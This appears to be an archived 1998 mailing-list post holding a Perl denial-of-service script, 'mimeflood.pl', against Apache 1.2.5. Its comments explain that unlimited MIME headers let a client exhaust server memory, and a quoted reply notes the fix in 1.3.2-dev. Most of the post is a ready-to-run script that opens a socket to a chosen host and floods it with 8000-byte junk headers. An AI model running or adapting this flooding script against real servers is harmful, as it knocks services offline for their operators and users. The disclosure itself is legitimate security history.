#! /bin/perl # mimeflood.pl - 02/08/1998 - L.Facq (facq@u-bordeaux.fr) # Web servers / possible DOS Attack / "mime header flooding" # # looking at the apache 1.2.5 source code i found # that there was no limit on how many mime headers could # be included in a client request. The only limits # are : 8192 byte for each header, 300 sec. on reading headers. # # => by sending a crazy amount of 8000 bytes headers, it's possible # to consume a lot of memory (and of course CPU). The point # is that httpd daemons grow and STAY at this big size (or die # if you send too much) # # -> may be a limit on mime header number could be added. # # -> may be other web server could be vulnerable to this problem. # # - i tried on an apache 1.2.5 -> it works # - i didnt installed 1.3.1 but looking at the source code, # i think the problem is there too. # ################################################## #From Roy T. Fielding / Sep 2 '98 at 12:57 pm -420 # #[...] #> #> -> may be a limit on mime header number could be added. # #Such limits have already been added to 1.3.2-dev. # #.....Roy use Socket; # Usage : $0 host [port [max] ] $max= 0; if ($ARGV[2]) { $max= $ARGV[2]; } $proto = getprotobyname('tcp'); socket(Socket_Handle, PF_INET, SOCK_STREAM, $proto); $port = 80; if ($ARGV[1]) { $port= $ARGV[1]; } $host = $ARGV[0]; $sin = sockaddr_in($port,inet_aton($host)); connect(Socket_Handle,$sin); send Socket_Handle,"GET / HTTP/1.0\n",0; $val= ('z'x8000)."\n"; $n= 1; $|= 1; while (Socket_Handle) { send Socket_Handle,"Stupidheader$n: ",0; send Socket_Handle,$val,0; $n++; if (!($n % 100)) { print "$n\n"; } if ($max && ($n > $max)) { last; } } print "Done: $n\n"; send Socket_Handle,"\n",0; while (<Socket_Handle>) { print $_; }
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:14:51 PDT